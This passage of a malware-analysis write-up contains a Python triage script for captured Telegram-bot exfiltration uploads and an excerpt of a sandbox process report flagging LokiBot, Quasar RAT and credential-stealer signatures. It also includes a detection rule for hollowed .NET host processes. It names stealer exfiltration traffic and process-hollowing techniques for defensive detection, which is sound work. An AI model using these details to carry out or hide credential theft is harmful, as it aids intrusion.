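    return {"http_method": http_method, "token": m["token"], "bot_id": m["token"].split(":")[0],
            "api_method": m["method"], "query": {k: v[0] for k, v in parse_qs(parts.query).items()}}


def parse_multipart(body, boundary):
    """Split a multipart/form-data body into (headers, payload) pairs."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing boundary
            break
        head, _, payload = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = dict(h.split(b": ", 1) for h in head.split(b"\r\n") if b": " in h)
        if payload.endswith(b"\r\n"):        # CRLF that precedes the next boundary
            payload = payload[:-2]
        parts.append((headers, payload))
    return parts


def assess(request_line, body, boundary, response_body):
    """Combine request and response into a triage record."""
    req = parse_bot_request(request_line)
    if req is None:
        return None
    files = []
    for headers, payload in parse_multipart(body, boundary):
        m = re.search(rb'filename="([^"]*)"', headers.get(b"Content-Disposition", b""))
        files.append({"filename": m[1].decode() if m else None, "size": len(payload)})
    resp = json.loads(response_body)
    return {"bot_id": req["bot_id"], "token": req["token"], "chat_id": req["query"].get("chat_id"),
            "api_method": req["api_method"], "caption": req["query"].get("caption"),
            "files": files, "exfil_succeeded": bool(resp.get("ok")),
            "error": resp.get("description")}


if __name__ == "__main__":
    print(json.dumps(assess(REQUEST_LINE, REQUEST_BODY, BOUNDARY, RESPONSE_BODY), indent=2))
```

                 The token in the path is the operator's credential: the Bot API accepts it for getMe and getUpdates, so it is worth preserving from proxy logs for attribution or takedown. A proxy or EDR rule keyed on POSTs to api.telegram.org whose path matches /bot<digits>:<token>/send* from a process that is not a messaging client catches this family regardless of which bot a given build uses.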



                Target ID:0
                Start time:09:07:20
                Start date:05/08/2022
                Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe"
                Imagebase:0xf10000
                File size:2457088 bytes
                MD5 hash:7278F8490937CAB29D3DD5BC75CB52AB
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.408533446.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.379707702.0000000004597000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.364389176.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                Reputation:low

                Target ID:13
                Start time:09:08:00
                Start date:05/08/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                Imagebase:0x7ff73c930000
                File size:261728 bytes
                MD5 hash:D621FD77BD585874F9686D3A76462EF1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:14
                Start time:09:08:01
                Start date:05/08/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                Imagebase:0x8c0000
                File size:261728 bytes
                MD5 hash:D621FD77BD585874F9686D3A76462EF1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Reputation:high

                Target ID:16
                Start time:09:08:08
                Start date:05/08/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                Imagebase:0xb80000
                File size:98912 bytes
                MD5 hash:6807F903AC06FF7E1670181378690B22
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                • Rule: HKTL_NET_GUID_SharpScribbles, Description: Detects .NET red/black-team tools via typelibguid, Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
                • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_ThunderFoxStealer, Description: Yara detected ThunderFox Stealer, Source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
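The three child processes listed above are Microsoft .NET Framework host binaries (two copies of MSBuild.exe and one AppLaunch.exe) started with nothing but their own path on the command line. MSBuild.exe launched without a project argument looks for a project file in the working directory and exits with an error when it finds none, so bare instances that stay alive, and in the case of target 16 carry the stealer's Yara hits in memory, are the usual signature of a hollowed host. The following is an added example (not part of the report and not Joe Security's tooling) of a process-creation rule in Python over constructed events. Paths and command lines for targets 0, 13, 14 and 16 are taken from the report; the parent links, the explorer.exe root, the two control cases and the allow-list of benign parents are assumptions for the example.

```python
from typing import Dict, List, Tuple

# .NET Framework host binaries routinely used as injection/hollowing targets: signed,
# in a trusted path, and almost never started by a user or by a downloaded executable.
DOTNET_HOSTS = {"msbuild.exe", "applaunch.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}

# Parents that legitimately launch these hosts (build tooling). ASSUMPTION: tune per estate.
BENIGN_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe", "cmd.exe", "powershell.exe"}

SAMPLE = r"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
APPLAUNCH = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

# CONSTRUCTED process-creation events keyed by the report's target IDs.
# Targets 0, 13, 14, 16: paths/command lines from the report; parent links assumed.
# Targets 99 and 100: control cases (normal build, bare MSBuild from an interactive shell).
EVENTS: List[Dict] = [
    {"pid": 0, "parent": r"C:\Windows\explorer.exe", "path": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"pid": 13, "parent": SAMPLE, "path": MSBUILD, "cmdline": MSBUILD},
    {"pid": 14, "parent": SAMPLE, "path": MSBUILD, "cmdline": MSBUILD},
    {"pid": 16, "parent": SAMPLE, "path": APPLAUNCH, "cmdline": APPLAUNCH},
    {"pid": 99, "parent": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     "path": MSBUILD, "cmdline": f'"{MSBUILD}" MyApp.csproj /t:Build'},
    {"pid": 100, "parent": r"C:\Windows\System32\cmd.exe", "path": MSBUILD, "cmdline": MSBUILD},
]


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_bare_commandline(path: str, cmdline: str) -> bool:
    """True when the command line is just the image path (quoted or not), no arguments."""
    return cmdline.strip().strip('"').lower() == path.lower()


def in_user_writable_dir(path: str) -> bool:
    p = path.lower()
    return p.startswith("c:\\users\\") or "\\appdata\\" in p or p.startswith("c:\\programdata\\")


def score_event(ev: Dict) -> Tuple[int, List[str]]:
    """Score one process-creation event; only .NET host images are considered."""
    reasons: List[str] = []
    if image_name(ev["path"]) not in DOTNET_HOSTS:
        return 0, reasons
    parent = image_name(ev["parent"])
    if is_bare_commandline(ev["path"], ev["cmdline"]):
        reasons.append("dotnet host started with no arguments")
    if parent not in BENIGN_PARENTS:
        reasons.append(f"unexpected parent {parent}")
    if in_user_writable_dir(ev["parent"]):
        reasons.append("parent image lives in a user-writable location")
    return len(reasons), reasons


def detect(events: List[Dict], threshold: int = 2) -> Dict[int, List[str]]:
    """Return {pid: reasons} for events reaching the threshold.

    A single weak signal (a developer typing msbuild in cmd.exe) stays below it;
    the combination of bare command line plus an odd parent does not.
    """
    findings: Dict[int, List[str]] = {}
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            findings[ev["pid"]] = reasons
    return findings


if __name__ == "__main__":
    for pid, why in detect(EVENTS).items():
        print(f"target {pid}: " + "; ".join(why))
```

In production, add the memory-side confirmation the sandbox relied on: a .NET host whose private, executable, non-image-backed regions match stealer rules is hollowed regardless of how it was launched.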

                No disassembly